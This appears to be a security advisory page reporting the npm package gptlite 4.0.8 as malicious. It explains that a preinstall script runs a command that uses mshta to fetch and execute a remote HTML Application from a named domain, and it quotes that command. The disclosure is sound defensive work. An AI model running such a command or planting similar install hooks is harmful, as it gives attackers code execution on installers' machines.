npm

gptlite @4.0.8

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 5:45 AM UTC

Malicious

OSV ID

MAL-2026-10461

Ecosystem

npm

Summary

The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command cmd /c "mshta http://fixars.top" . On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on npm install , before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.

Source: amazon-inspector (e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.